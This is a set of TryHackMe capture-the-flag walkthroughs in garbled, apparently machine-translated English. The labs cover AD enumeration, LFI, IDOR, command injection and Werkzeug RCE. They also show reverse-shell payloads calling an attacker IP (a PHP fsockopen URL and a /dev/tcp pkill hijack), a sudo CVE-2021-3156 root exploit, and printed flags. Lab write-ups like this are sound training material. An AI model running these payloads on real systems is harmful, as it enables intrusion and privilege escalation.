TryHackMe – Enumerating Active Directory Walkthrough

This is a walkthrough for “Enumerating Active Directory” of TryHackMe

Task2

Q1. What native Windows binary allows us to inject credentials legitimately into memory?

A. runas.exe

Q2. What parameter option of the runas binary will ensure that the injected credentials are used for all network connections?

A. /netonly

Q3. What network folder on a domain controller is accessible by any authenticated AD account and stores GPO information?

A. SYSVOL

Q4. When performing dir \za.tryhackme.com\SYSVOL, what type of authentication is performed by default?

A. Kerberos Authentication

Task3

Q1. How many Computer objects are part of the Servers OU?

Hint. Use MMC and navigate to the Servers OU

Follow the steps mentioned in TryHackMe to set up MMC.

ServersVerify the OU.

A. 2

Q2. How many Computer objects are part of the Workstations OU?

WorkstationsVerify the OU.

A. 1

Q3. How many departments (Organisational Units) does this organisation consist of?

Hint. Look under the People OU for department OUs.

PeopleCheck the subordinates.

A. 7

Q4. How many Admin tiers does this organisation have?

Hint. Look under the Admin OU for tier OUs.

AdminsVerify the OU.

A. 3

Q5. What is the value of the flag stored in the description attribute of the t0_tinus.green account?

Find Users, Contacts, and GroupsSearch for the account from and check the flags.t0_tinus.greenDescription

A. THM{Enumerating.Via.MMC}

Task4

Q1. Apart from the Domain Users group, what other group is the aaron.harris account a member of?

aaron.harrisView the account details and review the items.Global Group memberships

za\david.cook@THMJMP1 C:\Users\david.cook>net user aaron.harris /domain
The request will be processed at a domain controller for domain za.tryhackme.com.

User name                    aaron.harris
Full Name                    Aaron Harris
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/24/2022 10:05:11 PM
Password expires             Never
Password changeable          2/24/2022 10:05:11 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Internet Access
The command completed successfully.

A. Internet Access

Q2. Is the Guest account active? (Yay,Nay)

GuestView the account details and review the items.Account active

za\david.cook@THMJMP1 C:\Users\david.cook>net user Guest /domain
The request will be processed at a domain controller for domain za.tryhackme.com.

User name                    Guest
Full Name
Comment                      Built-in account for guest access to the computer/domain
User's comment
Country/region code          000 (System Default)
Account active               No
Account expires              Never

Password last set            1/31/2025 2:47:20 PM
Password expires             Never
Password changeable          1/31/2025 2:47:20 PM
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Guests
Global Group memberships     *Domain Guests
The command completed successfully.

A. Nay

Q3. How many accounts are a member of the Tier 1 Admins group?

Tier 1 AdminsReview the details of the group.

za\david.cook@THMJMP1 C:\Users\david.cook>net group "Tier 1 Admins" /domain
The request will be processed at a domain controller for domain za.tryhackme.com.

Group name     Tier 1 Admins
Comment

Members

-------------------------------------------------------------------------------
t1_arthur.tyler          t1_gary.moss             t1_henry.miller
t1_jill.wallis           t1_joel.stephenson       t1_marian.yates
t1_rosie.bryant
The command completed successfully.

A. 7

Q4. What is the account lockout duration of the current password policy in minutes?

View the password policy and review the items.Lockout duration

za\david.cook@THMJMP1 C:\Users\david.cook>net accounts /domain
The request will be processed at a domain controller for domain za.tryhackme.com.

Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          Unlimited
Minimum password length:                              0
Length of password history maintained:                None
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.

A. 30

Task5

Q1. What is the value of the Title attribute of Beth Nolan (beth.nolan)?

Hint. Use Get-ADUser, remember to set -Properties * to receive all properties.

beth.nolanCheck the properties of the account.Title

PS C:\Users\david.cook> Get-ADUser -Identity beth.nolan -Server za.tryhackme.com -Properties Title        


DistinguishedName : CN=beth.nolan,OU=Sales,OU=People,DC=za,DC=tryhackme,DC=com
Enabled           : True
GivenName         : Beth
Name              : beth.nolan
ObjectClass       : user
ObjectGUID        : c4ae7c4c-4f98-4366-b3a1-c57debe3256f
SamAccountName    : beth.nolan
SID               : S-1-5-21-3330634377-1326264276-632209373-2760
Surname           : Nolan
Title             : Senior
UserPrincipalName :

A. Senior

Q2. What is the value of the DistinguishedName attribute of Annette Manning (annette.manning)?

Hint. Use Get-ADUser, remember to set -Properties * to receive all properties.

annette.manningCheck the properties of the account.DistinguishedName

PS C:\Users\david.cook> Get-ADUser -Identity annette.manning -Server za.tryhackme.com -Properties Distingu
ishedName


DistinguishedName : CN=annette.manning,OU=Marketing,OU=People,DC=za,DC=tryhackme,DC=com
Enabled           : True
GivenName         : Annette
Name              : annette.manning
ObjectClass       : user
ObjectGUID        : 57069bf6-db28-4988-ac9e-0254ca51bb2f
SamAccountName    : annette.manning
SID               : S-1-5-21-3330634377-1326264276-632209373-1257
Surname           : Manning
UserPrincipalName :

A. CN=annette.manning,OU=Marketing,OU=People,DC=za,DC=tryhackme,DC=com

Q3. When was the Tier 2 Admins group created?

Hint. Use Get-ADGroup, remember to set -Properties * to receive all properties. Answer should be in DD/MM/YYYY HH:MM:SS AM/PM format. If you remote from your own local machine and it is in a timezone other than UTC+0 you will have to take timezones into account.

Tier 2 AdminsCheck the properties of the group.Created

PS C:\Users\david.cook> Get-ADGroup -Identity "Tier 2 Admins" -Server za.tryhackme.com -Properties created



Created           : 2/24/2022 10:04:41 PM
DistinguishedName : CN=Tier 2 Admins,OU=Groups,DC=za,DC=tryhackme,DC=com
GroupCategory     : Security
GroupScope        : Global
Name              : Tier 2 Admins
ObjectClass       : group
ObjectGUID        : 6edab731-c305-4959-bd34-4ca1eefe2b3f
SamAccountName    : Tier 2 Admins
SID               : S-1-5-21-3330634377-1326264276-632209373-1104

A. 2/24/2022 10:04:41 PM

Q4. What is the value of the SID attribute of the Enterprise Admins group?

Hint. Use Get-ADGroups, remember to set -Properties * to receive all properties.

Enterprise AdminsCheck the properties of the group.SID

PS C:\Users\david.cook> Get-ADGroup -Identity "Enterprise Admins" -Server za.tryhackme.com -Properties SID
   


DistinguishedName : CN=Enterprise Admins,CN=Users,DC=za,DC=tryhackme,DC=com
GroupCategory     : Security
GroupScope        : Universal
Name              : Enterprise Admins
ObjectClass       : group
ObjectGUID        : 93846b04-25b9-4915-baca-e98cce4541c6
SamAccountName    : Enterprise Admins
SID               : S-1-5-21-3330634377-1326264276-632209373-519

A. S-1-5-21-3330634377-1326264276-632209373-519

Q5. Which container is used to store deleted AD objects?

Hint. Use Get-ADDomain and review the information

za.tryhackme.comVerify the properties of the domain.DeletedObjectsContainer

PS C:\Users\david.cook> Get-ADDomain -Server za.tryhackme.com


ChildDomains                       : {}
ComputersContainer                 : CN=Computers,DC=za,DC=tryhackme,DC=com
DeletedObjectsContainer            : CN=Deleted Objects,DC=za,DC=tryhackme,DC=com

A. CN=Deleted Objects,DC=za,DC=tryhackme,DC=com

Task6

Q1. What command can be used to execute Sharphound.exe and request that it recovers Session information only from the za.tryhackme.com domain without touching domain controllers?

A. Sharphound.exe –CollectionMethods Session –Domain za.tryhackme.com –ExcludeDCs

Q2. Apart from the krbtgt account, how many other accounts are potentially kerberoastable?

Hint. Use the Per-Built Analytics Queries.

Sharphound.exeand run it.

PS C:\Users\andrea.mitchell> copy C:\Tools\Sharphound.exe ~\Documents\
PS C:\Users\andrea.mitchell> cd ~\Documents\
PS C:\Users\andrea.mitchell\Documents> .\Sharphound.exe --CollectionMethods All --Domain za.tryhackme.com --ExcludeDCs

At the end of the process, a ZIP file will be created.

PS C:\Users\andrea.mitchell\Documents> dir


    Directory: C:\Users\andrea.mitchell\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/31/2025   3:44 PM         121297 20250131154447_BloodHound.zip
-a----        3/16/2022   5:19 PM         906752 Sharphound.exe
-a----        1/31/2025   3:44 PM         359470 YzE4MDdkYjAtYjc2MC00OTYyLTk1YTEtYjI0NjhiZmRiOWY1.bin

Download the ZIP file with the SCP command.

$ scp andrea.mitchell@THMJMP1.za.tryhackme.com:C:/Users/andrea.mitchell/Documents/20250131154447_BloodHound.zip .
andrea.mitchell@thmjmp1.za.tryhackme.com's password: 
20250131154447_BloodHound.zip                                           100%  118KB  59.2KB/s   00:02

neo4j, and log in.bloodhound

$ sudo neo4j console
$ bloodhound

bloodhoundUpload the ZIP file by dragging and dropping it to the GUI.

AnalysisVerify your account from .List all kerberoastable Accounts

A. 4

Q3. How many machines do members of the Tier 1 Admins group have administrative access to?

Hint. Search for the Tier 1 Admins group and enumerate its information.

Tier 1 AdminsCheck from the group.Node InfoLocal ADMIN RIGHTS

A. 2

Q4. How many users are members of the Tier 2 Admins group?

Hint. Search for the Tier 2 Admins group and enumerate its information.

Tier 2 AdminsCheck from the group.Node InfoGROUP MEMBERS

A. 15

TryHackMe – Lo-Fi Walkthrough

This is the Walkthrough for TryHackMe “Lo-Fi”.

Task1

Q1. Climb the filesystem to find the flag!

Perform a port scan.

$ nmap -Pn -T4 -sVC -A -p- 10.10.174.194 -oN nmap_result
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a5:97:85:99:30:80:e2:7b:02:b1:ac:c9:65:e1:9d:05 (RSA)
|   256 e8:dc:f6:8d:84:fa:ab:0d:80:77:23:47:78:f4:31:ad (ECDSA)
|_  256 24:82:a1:9c:a6:3b:38:58:52:c2:21:13:25:86:55:f8 (ED25519)
80/tcp    open     http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Lo-Fi Music
|_http-server-header: Apache/2.2.22 (Ubuntu)

You now know the operational status of the port.

port	service	version
22	ssh	OpenSSH 8.2p1
80	http	Apache/2.2.22

80Access the number port.

DiscographyWhen you click on the link, the file specified by is loaded.?page=

It looks like LFI can be done.
I was able to load the file as follows.?page=../../../../../../etc/passwd/etc/passwd

?page=../../../../../../flag.txtI was able to get the flag at .

A. flag{e4478e0eab69bd642b8238765dcb7d18}

TryHackMe – Cat Pictures 2 Walkthrough

This is a TryHackMe “Cat Pictures 2” walkthrough.

Task2

Q1. What is Flag 1?

Perform a port scan.

$ nmap -Pn -T4 -sVC -A -p- 10.10.224.89 -oN nmap_result
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 33:f0:03:36:26:36:8c:2f:88:95:2c:ac:c3:bc:64:65 (RSA)
|   256 4f:f3:b3:f2:6e:03:91:b2:7c:c0:53:d5:d4:03:88:46 (ECDSA)
|_  256 13:7c:47:8b:6f:f8:f4:6b:42:9a:f2:d5:3d:34:13:52 (ED25519)
80/tcp   open  http    nginx 1.4.6 (Ubuntu)
|_http-title: Lychee
| http-robots.txt: 7 disallowed entries 
|_/data/ /dist/ /docs/ /php/ /plugins/ /src/ /uploads/
|_http-server-header: nginx/1.4.6 (Ubuntu)
| http-git: 
|   10.10.224.89:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Remotes:
|       https://github.com/electerious/Lychee.git
|_    Project type: PHP application (guessed from .gitignore)
222/tcp  open  ssh     OpenSSH 9.0 (protocol 2.0)
| ssh-hostkey: 
|   256 be:cb:06:1f:33:0f:60:06:a0:5a:06:bf:06:53:33:c0 (ECDSA)
|_  256 9f:07:98:92:6e:fd:2c:2d:b0:93:fa:fe:e8:95:0c:37 (ED25519)
1337/tcp open  waste?
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Content-Length: 3858
|     Content-Type: text/html; charset=utf-8
|     Date: Mon, 27 Jan 2025 12:38:17 GMT
|     Last-Modified: Wed, 19 Oct 2022 15:30:49 GMT
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>OliveTin</title>
|     <link rel = "stylesheet" type = "text/css" href = "style.css" />
|     <link rel = "shortcut icon" type = "image/png" href = "OliveTinLogo.png" />
|     <link rel = "apple-touch-icon" sizes="57x57" href="OliveTinLogo-57px.png" />
|     <link rel = "apple-touch-icon" sizes="120x120" href="OliveTinLogo-120px.png" />
|     <link rel = "apple-touch-icon" sizes="180x180" href="OliveTinLogo-180px.png" />
|     </head>
|     <body>
|     <main title = "main content">
|     <fieldset id = "section-switcher" title = "Sections">
|     <button id = "showActions">Actions</button>
|     <button id = "showLogs">Logs</but
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Content-Length: 3858
|     Content-Type: text/html; charset=utf-8
|     Date: Mon, 27 Jan 2025 12:38:18 GMT
|     Last-Modified: Wed, 19 Oct 2022 15:30:49 GMT
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>OliveTin</title>
|     <link rel = "stylesheet" type = "text/css" href = "style.css" />
|     <link rel = "shortcut icon" type = "image/png" href = "OliveTinLogo.png" />
|     <link rel = "apple-touch-icon" sizes="57x57" href="OliveTinLogo-57px.png" />
|     <link rel = "apple-touch-icon" sizes="120x120" href="OliveTinLogo-120px.png" />
|     <link rel = "apple-touch-icon" sizes="180x180" href="OliveTinLogo-180px.png" />
|     </head>
|     <body>
|     <main title = "main content">
|     <fieldset id = "section-switcher" title = "Sections">
|     <button id = "showActions">Actions</button>
|_    <button id = "showLogs">Logs</but
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: no-store, no-transform
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: i_like_gitea=42014f0627fe12cd; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=pjYVqyeTIH6ENhaDCfTa9aeCQ6Y6MTczNzk4MTQ5Nzg4Mjc4NzIyMw; Path=/; Expires=Tue, 28 Jan 2025 12:38:17 GMT; HttpOnly; SameSite=Lax
|     Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Mon, 27 Jan 2025 12:38:17 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title> Gitea: Git with a cup of tea</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2xvY2FsaG9zdDozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRwOi
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Cache-Control: no-store, no-transform
|     Set-Cookie: i_like_gitea=0accb03d95b3c415; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=rPlj3mCHTQlsR2i2JNfafjWPIYs6MTczNzk4MTUwNDE2MjI5OTQzOQ; Path=/; Expires=Tue, 28 Jan 2025 12:38:24 GMT; HttpOnly; SameSite=Lax
|     Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Mon, 27 Jan 2025 12:38:24 GMT
|_    Content-Length: 0
8080/tcp open  http    SimpleHTTPServer 0.6 (Python 3.6.9)
|_http-title: Welcome to nginx!
|_http-server-header: SimpleHTTP/0.6 Python/3.6.9

You now know the operational status of the port.

port	service	version
22	ssh	OpenSSH 7.6p1
80	http	nginx 1.4.6
222	ssh	OpenSSH 9.0
1337	waste?
3000	ppp?
8080	http	SimpleHTTPServer 0.6

80When I accessed the number port, I was able to see the application that allows me to publish photos.

I found out that I was using it from the login screen.Lychee 3.1.1

https://qiita.com/embed-contents/link-card#qiita-embed-content__3abc69021524d22333bc43cca83c0264

1337Access the number port.

It seems that shellcode and execution can be done here.Ansible playbook

I found that is used here.OliveTin

https://qiita.com/embed-contents/link-card#qiita-embed-content__5026382d1371a95781fe6ee6850d4c31

3000On the number port, it is running.Gitea

https://qiita.com/embed-contents/link-card#qiita-embed-content__958db53afbd1576d5343890cf489e514

You have an account registered with Gitea.
The repository could not be verified.samarium

80Look at the number port.
Download images of cats fromDirect Link

When I checked the metadata, I found the path of the port.8080

$ exiftool f5054e97620f168c7b5088c85ab1d6e4.jpg

(省略)

Title                           : :8080/764efa883dda1e11db47671c4a3bbd9e.txt

I was able to get the credentials to access it.Gitea

When I logged in, I was able to access the repository.ansible

flag1.txtI was able to get the flag from.

A. 10d916eaea54bb5ebe36b59538146bb5

Q2. What is Flag 2?

Hint. Ansible!

playbook.yamlI was able to check the execution contents of Ansible from .

It seems that ansible allows you to run shellcode in modules.shell

https://qiita.com/embed-contents/link-card#qiita-embed-content__d2af9390e23828e3f7a8c39f88278cff

Edit from the Gitea repository.
Replace it with a ping command and try to run it from the number port.playbook.yaml1337Run Ansible Playbook

Since the packet was received, I knew that the change was reflected.Gitea

$ sudo tcpdump -i tun0 icmp                                                
[sudo] password for kali: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
08:33:05.537596 IP 10.10.224.89 > 10.6.55.144: ICMP echo request, id 3915, seq 1, length 64
08:33:05.537608 IP 10.6.55.144 > 10.10.224.89: ICMP echo reply, id 3915, seq 1, length 64

shellto the payload of the reverse shell.

I was able to get a shell to listen with Netcat and run it from again.Run Ansible Playbookbismuth

$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.224.89] 37402
bismuth@catpictures-ii:~$ whoami
whoami
bismuth
bismuth@catpictures-ii:~$

/home/bismuth/.ssh/id_rsaI was able to get the SSH private key from.

bismuth@catpictures-ii:~$ cat .ssh/id_rsa
cat .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA2epfgbqSrWGvHLh3a3K2X/6flpaL2ccuKMjnkBfxJhPK721K
uuqJIyB0iMoWmBFo+10TX3L8LRd5rgVKiTyv0QhVcHX2tFK5ma88a2xAuaMe5BJP
DwDkVfS2lnxgfBO9U4d73IK7963QwMF3u98bueJZkKkrFr4jfvbkDJOP24a95H4v

(省略)

SSH connection succeeded with private key.

$ ssh -i id_rsa bismuth@10.10.224.89
bismuth@catpictures-ii:~$

/home/bismuth/flag2.txtI was able to get the flag from.

$ cat flag2.txt 
5e2cafbbf180351702651c09cd797920

A. 5e2cafbbf180351702651c09cd797920

Q3. What is Flag 3?

linpeasThe information came out when enumerating with.CVE-2021-3156

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

The following PoC was used for the attack.

https://qiita.com/embed-contents/link-card#qiita-embed-content__e38a33dd8975dcafbd47aad62c66d03c

Download the PoC to Kali and download it from Kali to the target machine.

build.

$ make
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c

Determine the number of the supported operating system.

$ ./sudo-hax-me-a-sandwich

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

  usage: ./sudo-hax-me-a-sandwich <target>

  available targets:
  ------------------------------------------------------------
    0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
    1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
    2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
  ------------------------------------------------------------

  manual mode:
    ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>

When I ran the PoC, I succeeded in privilege escalation.

$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# whoami 
root

/root/flag3.txtI was able to get the flag from.

# cat /root/flag3.txt
6d2a9f8f8174e86e27d565087a28a971

A. 6d2a9f8f8174e86e27d565087a28a971

TryHackMe – OWASP TOP 10 – 2021 Walkthrough

This is a Walkthrough of TryHackMe “OWASP Top 10 – 2021”.

Task4

Q2. Deploy the machine and go to http://MACHINE_IP – Login with the username noot and the password test1234.

Launch the target machine, visit the website, and you will see a login form.

Username: nootLog in with ,.Password: test1234

Q3. Look at other users’ notes. What is the flag?

Hint. The URL contains ?note_id=1 – I wonder what happens if you change the parameter value? You might be able to access another user’s notes.

note_id=1It seems that the note with the number specified in the parameter will be displayed as follows.note_id

note_id=0You can get another note data by specifying and you get the flag.

A. flag{fivefourthree}

Task8

Q1. What is the name of the mentioned directory?

Hint. Have a look at the source code on the /login page.

81Access the number port.

/login.phpI found the path in the source code of ./assets

A. /assets

Q2. Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

/assetsI found access to thewebapp.db

A. webapp.db

Q3. Use the supporting material to access the sensitive data. What is the password hash of the admin user?

webapp.dbWhen I downloaded and checked the data, I found the account name and password hash value.

A. 6eea9b7ef19179a06954edd0f6c05ceb

Q4. What is the admin’s plaintext password?

Hint. Read the supporting material.

The following site is used to analyze the hash value.

https://qiita.com/embed-contents/link-card#qiita-embed-content__b92bf01b182dceba1d7ea24ecc9a4351

adminThe password hash was successfully parsed, and the plaintext of the password was known.

A. qwertyuiop

Q5. Log in as the admin. What is the flag?

/login.phpI was able to get the flag when I logged in with .Username: adminPassword: qwertyuiop

For the purposes of 1C0 THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}

Task10

Q1. What strange text file is in the website’s root directory?

82Access the number port.

$()Command injection was successful.

$(ls)I was able to check the file structure in .

A. drpepper.txt

Q2. How many non-root/non-service/non-daemon users are there?

/etc/passwdConfirm.

A. 0

Q3. What user is this app running as?

whoamiConfirm with the command.

A. apache

Q4. What is the user’s shell set as?

/etc/passwdConfirm from:

A. /sbin/nologin

Q5. What version of Alpine Linux is running?

Hint. The version can be found in “/etc/alpine-release”.

/etc/alpine-releaseConfirm from:

A. 3.16.0

Task11

Q2. What is the value of the flag in joseph’s account?

Hint. Is there any security question that can be easily guessed?

85Access the number port.

josephI don’t know the password for , so I will try to change the password from there./resetpass1.php

There are three secret questions, but it seems easy to guess from.favorite color

When you finally enter it, you will be issued a new password, so make a note of it.green

You have successfully logged in with your new password.

I was able to get the flags from a text file.

A. THM{Not_3ven_c4tz_c0uld_sav3_U!}

Task12

Q1. Navigate to http://TARGET_IP:86/console to access the Werkzeug console.

/consoleWhen I accessed the Werkzeug console, I was able to see the Werkzeug console.

Q2. What is the database file name (the one with the .db extension) in the current directory?

osRCE from the console was successful with the help of the module.

import os; print(os.popen("ls -l").read())

A. todo.db

Q3. Modify the code to read the contents of the app.py file, which contains the application’s source code. What is the value of the secret_flag variable in the source code?

Hint. The flag looks like THM{…}. Be sure to write it without the surrounding quotes!

app.pyReview the code.

import os; print(os.popen("cat app.py").read())

A. THM{Just_a_tiny_misconfiguration}

TryHackMe – Hacker vs. Hacker Walkthrough

Task1

Q1. What is the user.txt flag?

Hint. The hacker may have been a bit sloppy in their stealth measures…

Perform a port scan.

$ nmap -Pn -sC -sV -A -T4 10.10.93.193 -oN nmap_result
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9f:a6:01:53:92:3a:1d:ba:d7:18:18:5c:0d:8e:92:2c (RSA)
|   256 4b:60:dc:fb:92:a8:6f:fc:74:53:64:c1:8c:bd:de:7c (ECDSA)
|_  256 83:d4:9c:d0:90:36:ce:83:f7:c7:53:30:28:df:c3:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: RecruitSec: Industry Leading Infosec Recruitment
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

You now know the operational status of the port.

port	service	version
22	ssh	OpenSSH 8.2p1
80	http	Apache httpd 2.4.41

80I was able to access the website at the number port.

Perform directory enumeration.

$ dirsearch -u http://10.10.93.193
[04:53:16] 301 -  310B  - /css  ->  http://10.10.93.193/css/
[04:53:17] 301 -  310B  - /cvs  ->  http://10.10.93.193/cvs/
[04:53:17] 200 -   26B  - /cvs/
[04:53:19] 301 -  311B  - /dist  ->  http://10.10.93.193/dist/
[04:53:19] 200 -  455B  - /dist/
[04:53:30] 301 -  313B  - /images  ->  http://10.10.93.193/images/
[04:53:30] 200 -  498B  - /images/
[04:54:14] 200 -  335B  - /upload.php

Uploading files has been rewritten./upload.php

The original process seems to be a function to determine whether the file is a file and upload it to the file.
In this case, the attacker would use a technique to bypass the extension determination by uploading a file such as the following:
Since PHP is running on the server, it is likely that the attacker uploaded a PHP reverse shell file..pdf/cvs.pdf.php

It predicts what the attacker would have uploaded and scans the subordinates..pdf.php/cvs

$ dirsearch -u http://10.10.222.254/cvs -e .pdf.php
[11:31:30] 200 -   18B  - /cvs/shell.pdf.php

/cvs/shell.pdf.phpwas hit.
Shell files can often execute commands with GET request parameters.
Fuzz the parameter name.

$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://10.10.222.254/cvs/shell.pdf.php?FUZZ=ls -ic -c -fs 18
cmd                     [Status: 200, Size: 43, Words: 1, Lines: 4, Duration: 241ms]

cmdParameters discovered.

Send parameters.

?cmd=php%20-r%20%27$sock=fsockopen(%2210.6.55.144%22,1234);exec(%22bash%20%3C%263%20%3E%263%202%3E%263%22);%27

Stretch the reverse shell.

$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.222.254] 42840
ls
index.html
shell.pdf.php

/home/lachlan/user.txtYou can get the flag from:

/home/lachlan/user.txt

thm{af7e46b68081d4025c5ce10851430617}

A. thm{af7e46b68081d4025c5ce10851430617}

Q2. What is the proof.txt flag?

Hint. … and a bit sloppy in their automated kill scripts.

/home/lachlan/.bash_historyWhen you check the password, you will find that it is.lachlanthisistheway123

./cve.sh
./cve-patch.sh
vi /etc/cron.d/persistence
echo -e "dHY5pzmNYoETv7SUaY\nthisistheway123\nthisistheway123" | passwd
ls -sf /dev/null /home/lachlan/.bash_history

However, when I made an SSH connection, I was able to log in, but the connection was disconnected after a few seconds.

$ ssh lachlan@10.10.222.254
lachlan@10.10.222.254's password: 
Last login: Thu May  5 04:39:19 2022 from 192.168.56.1
$ pwdnope
Connection to 10.10.222.254 closed.

/home/lachlan/.bash_historyIf you check the script that you found in , the process has been killed by the script./etc/cron.d/persistence

PATH=/home/lachlan/bin:/bin:/usr/bin
# * * * * * root backup.sh
* * * * * root /bin/sleep 1  && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 11 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 21 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 31 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 41 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 51 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done

PATH=/home/lachlan/bin:/bin:/usr/binIf you look at the commands, you can see that they are referenced in order from the path, but they are not specified with an absolute path.
If you create a file in , it will be executed./home/lachlan/binpkill/home/lachlan/binpkill/home/lachlan/bin/pkill

/home/lachlan/bin/pkillas a reverse shell script.

echo '#!/bin/bash' > /home/lachlan/bin/pkill && echo 'sh -i >& /dev/tcp/10.6.55.144/1234 0>&1' >> /home/lachlan/bin/pkill && chmod +x /home/lachlan/bin/pkill

Wait for Netcat in advance.

$ nc -lvnp 1234

SSH in and enter the command before the process is killed.

$ ssh lachlan@10.10.222.254
$ echo '#!/bin/bash' > /home/lachlan/bin/pkill && echo 'sh -i >& /dev/tcp/10.6.55.144/1234 0>&1' >> /home/lachlan/bin/pkill && chmod +x /home/lachlan/bin/pkill
$ nope

After a while, I was able to get the root shell.

$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.222.254] 42862
sh: 0: can't access tty; job control turned off
# whoami
root

/root/root.txtYou can get the flag from:

/root/root.txt

thm{7b708e5224f666d3562647816ee2a1d4}

A. thm{7b708e5224f666d3562647816ee2a1d4}